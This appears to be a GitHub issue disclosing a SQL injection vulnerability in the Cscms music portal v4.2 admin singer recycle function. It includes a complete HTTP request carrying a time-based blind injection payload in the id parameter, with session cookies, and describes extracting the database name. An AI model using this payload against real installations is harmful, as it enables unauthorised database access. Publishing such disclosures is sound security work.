SQL injection vulnerability exists in Cscms music portal system v4.2

#### Details

There is a Injection vulnerability exists in singer_Singer.php_hy

After logging in, the administrator needs to add a singer and then delete the singer. When the singer is recycled from the recycle bin, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows

```
GET /admin.php/singer/admin/singer/hy?id=4)and(sleep(5))--+ HTTP/1.1
Host: cscms.test
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://cscms.test/admin.php/singer/admin/singer?yid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=8adckmrcsj3354hqhqqe0pb8hhu14j85
Connection: close
```

![image](https://user-images.githubusercontent.com/96719328/164126684-6ad95817-781c-4a55-a3b2-32e70ff4559b.png)

Discovery success makes the server sleep
Construct payload database

![image](https://user-images.githubusercontent.com/96719328/164126766-bf51e614-768d-4620-9813-f4e3d3d9299a.png)

![image](https://user-images.githubusercontent.com/96719328/164126777-0ed4e46f-1024-49c0-a51a-3dfa7fd5e1b2.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SQL injection vulnerability exists in Cscms music portal system v4.2 #27

Details

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development